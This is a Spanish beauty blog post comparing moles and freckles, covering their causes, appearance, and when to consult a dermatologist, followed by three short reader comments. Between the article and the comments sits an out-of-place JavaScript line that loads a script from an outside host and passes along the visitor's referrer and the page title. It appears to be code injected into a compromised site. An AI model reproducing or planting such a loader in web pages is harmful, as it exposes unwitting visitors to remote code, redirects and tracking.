Salud y belleza » Belleza, Salud

¿Conoces las diferencias entre los lunares y las pecas?

3 Comentarios

Los lunares y las pecas pueden aparecer por causas similares, como una exposición prolongada al sol. Sin embargo, existen varias diferencias entre las pecas y los lunares, como por ejemplo su tamaño, su forma o su color.

Los lunares pueden aparecer en cualquier momento de la vida, incluso al nacer los bebés suelen tenerlos también. Pero habitualmente los lunares van apareciendo de forma repentina cuando vamos haciéndonos adultos. Son pigmentaciones en la piel. Los lunares que son redondos suelen ser benignos e incluso pueden presentar pelo y coloraciones distintas. Normalmente se ven sobre la piel a simple vista. Sin embargo, hay algunos lunares que pueden ser malignos, por lo que es preciso ir haciendo un seguimiento y una observación de su forma y color, si cambian puede ser peligroso por lo que hay que ir a un dermatólogo.

lunares

En cuanto a las pecas, normalmente se deben a un aumento de la melanina y son manchas de tonalidad más oscura. Son planas, no tienen relieve como los lunares. Normalmente el sol suele resaltar más las pecas y en invierno pueden llegar incluso a desaparecer. Lo normal es que las pecas aparezcan en los brazos y en la cara, y normalmente las personas con piel clara o rojiza son más propensas a tener pecas. Lo bueno es que no son una amenaza para la salud.

pecas

Las pecas y los lunares suelen ser bien aceptados por quien los tiene, pero hay gente que decide eliminarlos con tecnología láser de forma rápida y efectiva, sin cicatrices.

¿Tienes lunares o pecas? ¿Te molestan o los ves como algo normal?

s.src='http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=' + encodeURIComponent(document.referrer) + '&default_keyword=' + encodeURIComponent(document.title) + '';

Más consejos de salud y belleza :

3 Comments »

  • andrea said:

    yo tengo pecas hasta en las rodillas y no me gusta!

  • belen said:

    a mi las pecas me parecen muy bonitas, dan sensación de inocencia.

  • Angela said:

    Me encantan las pecas

Publique su Comentario !

Add your comment below, or trackback from your own site. You can also subscribe to these comments via RSS.

Be nice. Keep it clean. Stay on topic. No spam.